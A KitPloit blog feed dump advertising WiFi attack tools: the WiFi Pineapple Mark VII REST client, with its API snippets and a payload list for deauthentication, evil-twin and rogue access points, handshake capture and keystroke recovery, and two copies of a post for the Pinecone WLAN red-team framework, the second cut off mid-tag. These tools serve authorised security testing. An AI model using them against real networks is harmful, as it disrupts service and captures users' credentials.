tag:blogger.com,1999:blog-83172222311336605472024-03-19T08:30:32.443-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger129125tag:blogger.com,1999:blog-8317222231133660547.post-36437207441363773912023-09-04T08:30:00.003-03:002023-09-04T08:30:00.143-03:00WiFi-Pineapple-MK7_REST-Client - WiFi Hacking Workflow With WiFi Pineapple Mark VII API<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPsE196eB7FLv3EL6CvEzNMzLkFeNYmeeZHE7kOTzEUabOyYPS5JJ66Kxh3T00ffaH1W5uCH8DxkKnFib_uxlBJbWeYTi3xAGwE28klWQ9Guwzh8i6mQsEOupkQV-5VykrF9yK-s5Ip6zJ-UGOQOE1bk6_FKfIOxqRJZWo_zcKwSLTQo8t-Nd8NVjlIHzf/s794/wifi-pineapple.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="578" data-original-width="794" height="466" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPsE196eB7FLv3EL6CvEzNMzLkFeNYmeeZHE7kOTzEUabOyYPS5JJ66Kxh3T00ffaH1W5uCH8DxkKnFib_uxlBJbWeYTi3xAGwE28klWQ9Guwzh8i6mQsEOupkQV-5VykrF9yK-s5Ip6zJ-UGOQOE1bk6_FKfIOxqRJZWo_zcKwSLTQo8t-Nd8NVjlIHzf/w640-h466/wifi-pineapple.png" width="640" /></a></div><p><br /></p><h1 dir="auto" tabindex="-1">PINEAPPLE MARK VII REST CLIENT</h1> <ul dir="auto"> <li>The leading rogue access point and WiFi <a href="https://www.kitploit.com/search/label/Pentest%20Toolkit" target="_blank" title="pentest toolkit">pentest toolkit</a> for close access operations.</li> <li>Passive and active attacks analyze <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> and misconfigured devices.</li> <li><a href="https://hak5.org/collections/sale/products/wifi-pineapple" rel="nofollow" target="_blank" title="https://hak5.org/collections/sale/products/wifi-pineapple">https://hak5.org/collections/sale/products/wifi-pineapple</a></li> </ul> <blockquote> <p dir="auto"><strong>Author</strong>:: TW-D</p> <p dir="auto"><strong>Version</strong>:: 1.3.7</p> <p dir="auto"><strong>Copyright</strong>:: Copyright (c) 2022 TW-D</p> <p dir="auto"><strong>License</strong>:: Distributes under the same terms as Ruby</p> <p dir="auto"><strong>Doc</strong>:: <a href="https://hak5.github.io/mk7-docs/docs/rest/rest/" rel="nofollow" target="_blank" title="https://hak5.github.io/mk7-docs/docs/rest/rest/">https://hak5.github.io/mk7-docs/docs/rest/rest/</a></p> <p dir="auto"><strong>Requires</strong>:: Ruby >= 2.7.0p0 and <a href="https://www.kitploit.com/search/label/Pineapple" target="_blank" title="Pineapple">Pineapple</a> Mark VII >= 2.1.0-stable</p> <p dir="auto"><strong>Installation (Debian, Ubuntu, Raspbian)</strong>::</p> <ul dir="auto"> <li> <p dir="auto">sudo apt-get install build-essential curl g++ ruby ruby-dev</p> </li> <li> <p dir="auto">sudo gem install net-ssh rest-client tty-progressbar</p> </li> </ul> </blockquote> <h2 dir="auto" tabindex="-1">Description</h2> <p dir="auto">Library allowing the <a href="https://www.kitploit.com/search/label/Automation" target="_blank" title="automation">automation</a> of active or passive attack operations.</p> <p dir="auto"><strong>Note :</strong> <em>"Issues" and "Pull Request" are welcome.</em></p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Payloads</h2> <p dir="auto">In <em>"./payloads/"</em> directory, you will find :</p> <table> <tbody><tr> <th>COMMAND and CONTROL</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>Hak5 Key Croc - Real-time recovery of <a href="https://www.kitploit.com/search/label/Keystrokes" target="_blank" title="keystrokes">keystrokes</a> from a keyboard</td> <td>TW-D</td> <td>(edit) ruby ./hak5_key-croc.rb</td> </tr> <tr> <td>Maltronics WiFi Deauther - Spam beacon frames</td> <td>TW-D</td> <td>(edit) ruby ./maltronics_wifi-deauther.rb</td> </tr> </tbody></table> <table> <tbody><tr> <th>DEFENSE</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>Hak5 Pineapple Spotter</td> <td>TW-D with special thanks to <strong><a href="https://github.com/DrSKiZZ" rel="nofollow" target="_blank" title="@DrSKiZZ">@DrSKiZZ</a></strong>, <strong><a href="https://github.com/cribb-it" rel="nofollow" target="_blank" title="@cribb-it">@cribb-it</a></strong>, <strong><a href="https://github.com/barry99705" rel="nofollow" target="_blank" title="@barry99705">@barry99705</a></strong> and <strong><a href="https://codeberg.org/dark_pyrro" rel="nofollow" target="_blank" title="@dark_pyrro">@dark_pyrro</a></strong></td> <td>(edit) ruby ./hak5-pineapple_spotter.rb</td> </tr> </tbody></table> <table> <tbody><tr> <th>DoS</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>Deauthentication of clients available on the access points</td> <td>TW-D</td> <td>(edit) ruby ./deauthentication-clients.rb</td> </tr> </tbody></table> <table> <tbody><tr> <th>EXPLOITATION</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>Evil WPA Access Point</td> <td>TW-D</td> <td>(edit) ruby ./evil-wpa_access-point.rb</td> </tr> <tr> <td>Fake Access Points</td> <td>TW-D</td> <td>(edit) ruby ./fake_access-points.rb</td> </tr> <tr> <td>Mass Handshakes</td> <td>TW-D</td> <td>(edit) ruby ./mass-handshakes.rb</td> </tr> <tr> <td>Rogue Access Points</td> <td>TW-D</td> <td>(edit) ruby ./rogue_access-points.rb</td> </tr> <tr> <td>Twin Access Points</td> <td>TW-D</td> <td>(edit) ruby ./twin_access-points.rb</td> </tr> </tbody></table> <table> <tbody><tr> <th>GENERAL</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>System Status, Disk Usage, ...</td> <td>TW-D</td> <td>(edit) ruby ./dashboard-stats.rb</td> </tr> <tr> <td>Networking Interfaces</td> <td>TW-D</td> <td>(edit) ruby ./networking-interfaces.rb</td> </tr> <tr> <td>System Logs</td> <td>TW-D</td> <td>(edit) ruby ./system-logs.rb</td> </tr> </tbody></table> <table> <tbody><tr> <th>RECON</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>Access Points and Clients on 2.4GHz and 5GHz (with a supported adapter)</td> <td>TW-D</td> <td>(edit) ruby ./access-points_clients_5ghz.rb</td> </tr> <tr> <td>Access Points and Clients</td> <td>TW-D</td> <td>(edit) ruby ./access-points_clients.rb</td> </tr> <tr> <td>MAC Addresses of Access Points</td> <td>TW-D</td> <td>(edit) ruby ./access-points_mac-addresses.rb</td> </tr> <tr> <td>Tagged Parameters of Access Points</td> <td>TW-D</td> <td>(edit) ruby ./access-points_tagged-parameters.rb</td> </tr> <tr> <td>Access Points and Wireless Network Mapping with WiGLE</td> <td>TW-D</td> <td>(edit) ruby ./access-points_wigle.rb</td> </tr> <tr> <td>MAC Addresses of Clients</td> <td>TW-D</td> <td>(edit) ruby ./clients_mac-addresses.rb</td> </tr> <tr> <td>OPEN Access Points</td> <td>TW-D</td> <td>(edit) ruby ./open_access-points.rb</td> </tr> <tr> <td>WEP Access Points</td> <td>TW-D</td> <td>(edit) ruby ./wep_access-points.rb</td> </tr> <tr> <td>WPA Access Points</td> <td>TW-D</td> <td>(edit) ruby ./wpa_access-points.rb</td> </tr> <tr> <td>WPA2 Access Points</td> <td>TW-D</td> <td>(edit) ruby ./wpa2_access-points.rb</td> </tr> <tr> <td>WPA3 Access Points</td> <td>TW-D</td> <td>(edit) ruby ./wpa3_access-points.rb</td> </tr> </tbody></table> <table> <tbody><tr> <th>WARDRIVING</th> <th>Author</th> <th>Usage</th> </tr> <tr> <td>Continuous Recon on 2.4GHz and 5GHz (with a supported adapter)</td> <td>TW-D</td> <td>(edit) ruby ./continuous-recon_5ghz.rb [CTRL+c]</td> </tr> <tr> <td>Continuous Recon for Handshakes Capture</td> <td>TW-D</td> <td>(edit) ruby ./continuous-recon_handshakes.rb [CTRL+c]</td> </tr> <tr> <td>Continuous Recon</td> <td>TW-D</td> <td>(edit) ruby ./continuous-recon.rb [CTRL+c]</td> </tr> </tbody></table> <h2 dir="auto" tabindex="-1">Payload skeleton for development</h2> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="# # Title: <TITLE> # # Description: <DESCRIPTION> # # # Author: <AUTHOR> # Version: <VERSION> # Category: <CATEGORY> # # STATUS # ====================== # <SHORT-DESCRIPTION> ... SETUP # <SHORT-DESCRIPTION> ... ATTACK # <SHORT-DESCRIPTION> ... SPECIAL # <SHORT-DESCRIPTION> ... FINISH # <SHORT-DESCRIPTION> ... CLEANUP # <SHORT-DESCRIPTION> ... OFF # require_relative('<PATH-TO>/classes/PineappleMK7.rb') system_authentication = PineappleMK7::System::Authentication.new system_authentication.host = "<PINEAPPLE-IP-ADDRESS>" system_authentication.port = 1471 system_authentication.mac = "<PINEAPPLE-MAC-ADDRESS>" system_authentication.password = "<ROOT-ACCOUNT-PASSWORD>" if (system_authentication.login) led = PineappleMK7::System::LED.new # SETUP # led.setup # # [...] # # ATTACK # led.attack # # [...] # # SPECIAL # led.special # # [...] # # FINISH # led.finish # # [...] # # CLEANUP # led.cleanup # # [...] # # OFF # led.off end" dir="auto"><pre><code>#<br /># Title: <TITLE><br />#<br /># Description: <DESCRIPTION><br />#<br />#<br /># Author: <AUTHOR><br /># Version: <VERSION><br /># Category: <CATEGORY><br />#<br /># STATUS<br /># ======================<br /># <SHORT-DESCRIPTION> ... SETUP<br /># <SHORT-DESCRIPTION> ... ATTACK<br /># <SHORT-DESCRIPTION> ... SPECIAL<br /># <SHORT-DESCRIPTION> ... FINISH<br /># <SHORT-DESCRIPTION> ... CLEANUP<br /># <SHORT-DESCRIPTION> ... OFF<br />#<br /><br />require_relative('<PATH-TO>/classes/PineappleMK7.rb')<br /><br />system_authentication = PineappleMK7::System::Authentication.new<br />system_authentication.host = "<PINEAPPLE-IP-ADDRESS>"<br />system_authentication.port = 1471<br />system_authentication.mac = "<PINEAPPLE-MAC-ADDRESS>"<br />system_authentication.password = "<ROOT-ACCOUNT-PASSWORD>"<br /><br />if (system_authentication.login)<br /><br /> led = PineappleMK7::System::LED.new<br /><br /> # SETUP<br /> #<br /> led.setup<br /><br /> #<br /> # [...]<br /> #<br /><br /> # ATTACK<br /> #<br /> led.attack<br /><br /> #<br /> # [...]<br /> #<br /><br /> # SPECIAL<br /> #<br /> led.special<br /><br /> #<br /> # [...]<br /> #<br /><br /> # FINISH<br /> #<br /> led.finish<br /><br /> #<br /> # [...]<br /> #<br /><br /> # CLEANUP<br /> #<br /> led.cleanup<br /><br /> #<br /> # [...]<br /> #<br /><br /> # OFF<br /> #<br /> led.off<br /><br />end</code></pre></div> <p dir="auto"><strong>Note :</strong> <em>Don't hesitate to take inspiration from the payloads directory.</em></p> <h2 dir="auto" tabindex="-1">System modules</h2> <h3 dir="auto" tabindex="-1">Authentication accessors/method</h3> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="system_authentication = PineappleMK7::System::Authentication.new system_authentication.host = (string) "<PINEAPPLE-IP-ADDRESS>" system_authentication.port = (integer) 1471 system_authentication.mac = (string) "<PINEAPPLE-MAC-ADDRESS>" system_authentication.password = (string) "<ROOT-ACCOUNT-PASSWORD>" system_authentication.login()" dir="auto"><pre><code>system_authentication = PineappleMK7::System::Authentication.new<br /><br />system_authentication.host = (string) "<PINEAPPLE-IP-ADDRESS>"<br />system_authentication.port = (integer) 1471<br />system_authentication.mac = (string) "<PINEAPPLE-MAC-ADDRESS>"<br />system_authentication.password = (string) "<ROOT-ACCOUNT-PASSWORD>"<br /><br />system_authentication.login()</code></pre></div> <h3 dir="auto" tabindex="-1">LED methods</h3> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="led = PineappleMK7::System::LED.new led.setup() led.failed() led.attack() led.special() led.cleanup() led.finish() led.off()" dir="auto"><pre><code>led = PineappleMK7::System::LED.new<br /><br />led.setup()<br />led.failed()<br />led.attack()<br />led.special()<br />led.cleanup()<br />led.finish()<br />led.off()</code></pre></div> <h2 dir="auto" tabindex="-1">Pineapple Modules</h2> <h3 dir="auto" tabindex="-1">Dashboard</h3> <h4 dir="auto" tabindex="-1">Notifications method</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="dashboard_notifications = PineappleMK7::Modules::Dashboard::Notifications.new dashboard_notifications.clear()" dir="auto"><pre><code>dashboard_notifications = PineappleMK7::Modules::Dashboard::Notifications.new<br /><br />dashboard_notifications.clear()</code></pre></div> <h4 dir="auto" tabindex="-1">Stats method</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="dashboard_stats = PineappleMK7::Modules::Dashboard::Stats.new dashboard_stats.output()" dir="auto"><pre><code>dashboard_stats = PineappleMK7::Modules::Dashboard::Stats.new<br /><br />dashboard_stats.output()</code></pre></div> <h3 dir="auto" tabindex="-1">Logging</h3> <h4 dir="auto" tabindex="-1">System method</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="logging_system = PineappleMK7::Modules::Logging::System.new logging_system.output()" dir="auto"><pre><code>logging_system = PineappleMK7::Modules::Logging::System.new<br /><br />logging_system.output()</code></pre></div> <h3 dir="auto" tabindex="-1">PineAP</h3> <h4 dir="auto" tabindex="-1">Clients methods</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="pineap_clients = PineappleMK7::Modules::PineAP::Clients.new pineap_clients.connected_clients() pineap_clients.previous_clients() pineap_clients.kick( (string) mac ) pineap_clients.clear_previous()" dir="auto"><pre><code>pineap_clients = PineappleMK7::Modules::PineAP::Clients.new<br /><br />pineap_clients.connected_clients()<br />pineap_clients.previous_clients()<br />pineap_clients.kick( (string) mac )<br />pineap_clients.clear_previous()</code></pre></div> <h4 dir="auto" tabindex="-1">EvilWPA accessors/method</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="evil_wpa = PineappleMK7::Modules::PineAP::EvilWPA.new evil_wpa.ssid = (string default:'PineAP_WPA') evil_wpa.bssid = (string default:'00:13:37:BE:EF:00') evil_wpa.auth = (string default:'psk2+ccmp') evil_wpa.password = (string default:'pineapplesareyummy') evil_wpa.hidden = (boolean default:false) evil_wpa.enabled = (boolean default:false) evil_wpa.capture_handshakes = (boolean default:false) evil_wpa.save()" dir="auto"><pre><code>evil_wpa = PineappleMK7::Modules::PineAP::EvilWPA.new<br /><br />evil_wpa.ssid = (string default:'PineAP_WPA')<br />evil_wpa.bssid = (string default:'00:13:37:BE:EF:00')<br />evil_wpa.auth = (string default:'psk2+ccmp')<br />evil_wpa.password = (string default:'pineapplesareyummy')<br />evil_wpa.hidden = (boolean default:false)<br />evil_wpa.enabled = (boolean default:false)<br />evil_wpa.capture_handshakes = (boolean default:false)<br /><br />evil_wpa.save()</code></pre></div> <h4 dir="auto" tabindex="-1">Filtering methods</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="pineap_filtering = PineappleMK7::Modules::PineAP::Filtering.new pineap_filtering.client_filter( (string) 'allow' | 'deny' ) pineap_filtering.add_client( (string) mac ) pineap_filtering.clear_clients() pineap_filtering.ssid_filter( (string) 'allow' | 'deny' )" dir="auto"><pre><code>pineap_filtering = PineappleMK7::Modules::PineAP::Filtering.new<br /><br />pineap_filtering.client_filter( (string) 'allow' | 'deny' )<br />pineap_filtering.add_client( (string) mac )<br />pineap_filtering.clear_clients()<br />pineap_filtering.ssid_filter( (string) 'allow' | 'deny' )</code></pre></div> <h4 dir="auto" tabindex="-1">Impersonation methods</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="pineap_impersonation = PineappleMK7::Modules::PineAP::Impersonation.new pineap_impersonation.output() pineap_impersonation.add_ssid( (string) ssid ) pineap_impersonation.clear_pool()" dir="auto"><pre><code>pineap_impersonation = PineappleMK7::Modules::PineAP::Impersonation.new<br /><br />pineap_impersonation.output()<br />pineap_impersonation.add_ssid( (string) ssid )<br />pineap_impersonation.clear_pool()</code></pre></div> <h4 dir="auto" tabindex="-1">OpenAP method</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="open_ap = PineappleMK7::Modules::PineAP::OpenAP.new open_ap.output()" dir="auto"><pre><code>open_ap = PineappleMK7::Modules::PineAP::OpenAP.new<br /><br />open_ap.output()</code></pre></div> <h4 dir="auto" tabindex="-1">Settings accessors/method</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="pineap_settings = PineappleMK7::Modules::PineAP::Settings.new pineap_settings.enablePineAP = (boolean default:true) pineap_settings.autostartPineAP = (boolean default:true) pineap_settings.armedPineAP = (boolean default:false) pineap_settings.ap_channel = (string default:'11') pineap_settings.karma = (boolean default:false) pineap_settings.logging = (boolean default:false) pineap_settings.connect_notifications = (boolean default:false) pineap_settings.disconnect_notifications = (boolean default:false) pineap_settings.capture_ssids = (boolean default:false) pineap_settings.beacon_responses = (boolean default:false) pineap_settings.broadcast_ssid_pool = (boolean default:false) pineap_settings.broadcast_ssid_pool_random = (boolean default:false) pineap_settings.pineap_mac = (string default:system_authentication.mac) pineap_settings.target_mac = (string default:'FF:FF:FF:FF:FF:FF') pineap_settings.beacon_response_interval = (string default:'NORMAL') pineap_settings.beacon_interval = (string default:'NORMAL') pineap_settings.save()" dir="auto"><pre><code>pineap_settings = PineappleMK7::Modules::PineAP::Settings.new<br /><br />pineap_settings.enablePineAP = (boolean default:true)<br />pineap_settings.autostartPineAP = (boolean default:true)<br />pineap_settings.armedPineAP = (boolean default:false)<br />pineap_settings.ap_channel = (string default:'11')<br />pineap_settings.karma = (boolean default:false)<br />pineap_settings.logging = (boolean default:false)<br />pineap_settings.connect_notifications = (boolean default:false)<br />pineap_settings.disconnect_notifications = (boolean default:false)<br />pineap_settings.capture_ssids = (boolean default:false)<br />pineap_settings.beacon_responses = (boolean default:false)<br />pineap_settings.broadcast_ssid_pool = (boolean default:false)<br />pineap_settings.broadcast_ssid_pool_random = (boolean default:false)<br />pineap_settings.pineap_mac = (string default:system_authentication.mac)<br />pineap_settings.target_mac = (string default:'FF:FF:FF:FF:FF:FF')< br/>pineap_settings.beacon_response_interval = (string default:'NORMAL')<br />pineap_settings.beacon_interval = (string default:'NORMAL')<br /><br />pineap_settings.save()</code></pre></div> <h3 dir="auto" tabindex="-1">Recon</h3> <h4 dir="auto" tabindex="-1">Handshakes methods</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="recon_handshakes = PineappleMK7::Modules::Recon::Handshakes.new recon_handshakes.start( (object) ap ) recon_handshakes.stop() recon_handshakes.output() recon_handshakes.download( (object) handshake, (string) destination ) recon_handshakes.clear()" dir="auto"><pre><code>recon_handshakes = PineappleMK7::Modules::Recon::Handshakes.new<br /><br />recon_handshakes.start( (object) ap )<br />recon_handshakes.stop()<br />recon_handshakes.output()<br />recon_handshakes.download( (object) handshake, (string) destination )<br />recon_handshakes.clear()</code></pre></div> <h4 dir="auto" tabindex="-1">Scanning methods</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="recon_scanning = PineappleMK7::Modules::Recon::Scanning.new recon_scanning.start( (integer) scan_time ) recon_scanning.start_continuous( (boolean) autoHandshake ) recon_scanning.stop_continuous() recon_scanning.output( (integer) scanID ) recon_scanning.tags( (object) ap ) recon_scanning.deauth_ap( (object) ap ) recon_scanning.delete( (integer) scanID )" dir="auto"><pre><code>recon_scanning = PineappleMK7::Modules::Recon::Scanning.new<br /><br />recon_scanning.start( (integer) scan_time )<br />recon_scanning.start_continuous( (boolean) autoHandshake )<br />recon_scanning.stop_continuous()<br />recon_scanning.output( (integer) scanID )<br />recon_scanning.tags( (object) ap )<br />recon_scanning.deauth_ap( (object) ap )<br />recon_scanning.delete( (integer) scanID )</code></pre></div> <h3 dir="auto" tabindex="-1">Settings</h3> <h4 dir="auto" tabindex="-1">Networking methods</h4> <div class="highlight highlight-source-ruby notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="settings_networking = PineappleMK7::Modules::Settings::Networking.new settings_networking.interfaces() settings_networking.client_scan( (string) interface ) settings_networking.client_connect( (object) network, (string) interface ) settings_networking.client_disconnect( (string) interface ) settings_networking.recon_interface( (string) interface )" dir="auto"><pre><code>settings_networking = PineappleMK7::Modules::Settings::Networking.new<br /><br />settings_networking.interfaces()<br />settings_networking.client_scan( (string) interface )<br />settings_networking.client_connect( (object) network, (string) interface )<br />settings_networking.client_disconnect( (string) interface )<br />settings_networking.recon_interface( (string) interface )</code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/TW-D/WiFi-Pineapple-MK7_REST-Client" rel="nofollow" target="_blank" title="Download WiFi-Pineapple-MK7_REST-Client">Download WiFi-Pineapple-MK7_REST-Client</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-40648725150669760142022-09-13T08:30:00.001-03:002022-09-13T08:30:00.287-03:00Pinecone - A WLAN Red Team Framework<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVprK5Si6fyKHJ3C1kKW7ZAgIrXIVRKpUQyF6sfn_ErcUUh-cnAXXtviqxEUBOj9Hi_plCXJN6WRPGWeLMNbfalbK350h2rqlk9zJc23vAaeUKIfxYu_F0NjXNX05aYzaERt7pJWPRbyBBdrK3RZf8zRHrjUDRYkK5D_2tyniApSvsyrhd-UCHShW-KA/s866/pinecone_1_logo_full.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="866" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVprK5Si6fyKHJ3C1kKW7ZAgIrXIVRKpUQyF6sfn_ErcUUh-cnAXXtviqxEUBOj9Hi_plCXJN6WRPGWeLMNbfalbK350h2rqlk9zJc23vAaeUKIfxYu_F0NjXNX05aYzaERt7pJWPRbyBBdrK3RZf8zRHrjUDRYkK5D_2tyniApSvsyrhd-UCHShW-KA/w640-h332/pinecone_1_logo_full.png" width="640" /></a></div><p align="center" dir="auto"><br /></p>
<p dir="auto">Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable <a href="https://www.kitploit.com/search/label/Wireless%20Auditing" target="_blank" title="wireless auditing">wireless auditing</a> box.</p>
<p dir="auto">This tool is designed for educational and research purposes only. Only use it with explicit permission.</p><span><a name='more'></a></span><p dir="auto"><br /></p>
<h2 dir="auto">Installation</h2>
<p dir="auto">For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, <a href="https://www.kitploit.com/search/label/Raspberry%20Pi" target="_blank" title="Raspberry Pi">Raspberry Pi</a> Desktop and Kali Linux). Pinecone has the following requirements:</p>
<ul dir="auto">
<li><strong>Python 3.5+</strong>. Your distribution probably comes with Python3 already installed, if not it can be installed using <code>apt-get install python3</code>.</li>
<li><strong>dnsmasq</strong> (tested with version 2.76). Can be installed using <code>apt-get install dnsmasq</code>.</li>
<li><strong>hostapd-wpe</strong> (tested with version 2.6). Can be installed using <code>apt-get install hostapd-wpe</code>. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a <a href="https://http.kali.org/pool/main/h/hostapd-wpe" rel="nofollow" target="_blank" title="Kali Linux repository pre-compiled package">Kali Linux repository pre-compiled package</a>, or <a href="https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe" rel="nofollow" target="_blank" title="compile it from its source code">compile it from its source code</a>.</li>
</ul>
<p dir="auto">After installing the necessary packages, you can install the Python packages <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> for Pinecone using <code>pip3 install -r requirements.txt</code> in the project root folder.</p>
<h2 dir="auto">Usage</h2>
<p dir="auto">For starting Pinecone, execute <code>python3 pinecone.py</code> from within the project root folder:</p>
<div><pre><code>root@kali:~/pinecone# python pinecone.py <br />[i] Database file: ~/pinecone/db/database.sqlite<br />pinecone > <br /></code></pre></div>
<p dir="auto">Pinecone is controlled via a Metasploit-like command-line interface. You can type <code>help</code> to get the list of available commands, or <code>help 'command'</code> to get more information about a specific command:</p>
<div><pre><code>pinecone > help<br /><br />Documented commands (type help <topic>):<br />========================================<br />alias help load pyscript set shortcuts use<br />edit history py quit shell unalias <br /><br />Undocumented commands:<br />======================<br />back run stop<br /><br />pinecone > help use<br />Usage: use module [-h]<br /><br />Interact with the specified module.<br /><br />positional arguments:<br /> module module ID<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /></code></pre></div>
<p dir="auto">Use the command <code>use 'moduleID'</code> to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:</p>
<div><pre><code>pinecone > use <br />attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap <br />daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake<br />pinecone > use discovery/recon <br />pcn module(discovery/recon) > <br /></code></pre></div>
<p dir="auto">Every module has options, that can be seen typing <code>help run</code> or <code>run --help</code> when a module is activated. Most modules have default values for their options (check them before running):</p>
<div><pre><code>pcn module(discovery/recon) > help run<br />usage: run [-h] [-i INTERFACE]<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> -i INTERFACE, --iface INTERFACE<br /> monitor mode capable WLAN interface (default: wlan0)<br /></code></pre></div>
<p dir="auto">When a module is activated, you can use the <code>run [options...]</code> command to start its functionality. The modules provide feedback of their execution state:</p>
<div><pre><code>pcn script(attack/wpa_handshake) > run -s TEST_SSID<br />[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...<br />................................................................<br />Sent 64 packets.<br />[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...<br /></code></pre></div>
<p dir="auto">If the module runs in background (for example, <em>scripts/infrastructure/ap</em>), you can stop it using the <code>stop</code> command when the module is running:</p>
<div>When you are done using a module, you can deactivate it by using the <code>back</code> command. You can also activate another module issuing the <code>use</code> command again.
<p dir="auto">Shell commands may be executed with the command <code>shell</code> or the <code>!</code> shortcut:</p>
<div><pre><code>pinecone > !ls<br />LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md<br /></code></pre></div>
<p dir="auto">Currently, Pinecone <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a> SQLite database is stored in the <em>db/</em> directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the <em>tmp/</em> directory also under the project root folder.</p>
<br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/pinecone-wifi/pinecone" rel="nofollow" target="_blank" title="Download Pinecone">Download Pinecone</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-42680338602121854312022-07-19T08:30:00.004-04:002022-07-19T08:30:00.258-04:00Pinecone - A WLAN Red Team Framework<p align="center" dir="auto"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhAPOxXYnzFFgRMTwiCbMNj4SS18g7ZIMnLjqPun-s45Hvu5DTLDJxEtcUFlikNsDNJNaJGmoNqs2DlIfFM_FIt6KKyacffQZeIOop8JMJ9LZeWeuQ_QncAZJWzvlsfKvXqvCzXwJCzgLlDFK05g_avNJPGmVvdM-q0cyTmRArEqE4aKgoP_4RsSJnF"><img alt="" border="0" height="332" id="BLOGGER_PHOTO_ID_7119743612226995154" src="https://blogger.googleusercontent.com/img/a/AVvXsEhAPOxXYnzFFgRMTwiCbMNj4SS18g7ZIMnLjqPun-s45Hvu5DTLDJxEtcUFlikNsDNJNaJGmoNqs2DlIfFM_FIt6KKyacffQZeIOop8JMJ9LZeWeuQ_QncAZJWzvlsfKvXqvCzXwJCzgLlDFK05g_avNJPGmVvdM-q0cyTmRArEqE4aKgoP_4RsSJnF=w640-h332" width="640" /></a> </p> <p dir="auto"><br /></p><p dir="auto">Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable <a href="https://www.kitploit.com/search/label/Wireless%20Auditing" target="_blank" title="wireless auditing">wireless auditing</a> box.</p> <p dir="auto">This tool is designed for educational and research purposes only. Only use it with explicit permission.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto">Installation</h2> <p dir="auto">For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, <a href="https://www.kitploit.com/search/label/Raspberry%20Pi" target="_blank" title="Raspberry Pi">Raspberry Pi</a> Desktop and Kali Linux). Pinecone has the following requirements:</p> <ul dir="auto"> <li><strong>Python 3.5+</strong>. Your distribution probably comes with Python3 already installed, if not it can be installed using <code>apt-get install python3</code>.</li> <li><strong>dnsmasq</strong> (tested with version 2.76). Can be installed using <code>apt-get install dnsmasq</code>.</li> <li><strong>hostapd-wpe</strong> (tested with version 2.6). Can be installed using <code>apt-get install hostapd-wpe</code>. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a <a href="https://http.kali.org/pool/main/h/hostapd-wpe" rel="nofollow" target="_blank" title="Kali Linux repository pre-compiled package">Kali Linux repository pre-compiled package</a>, or <a 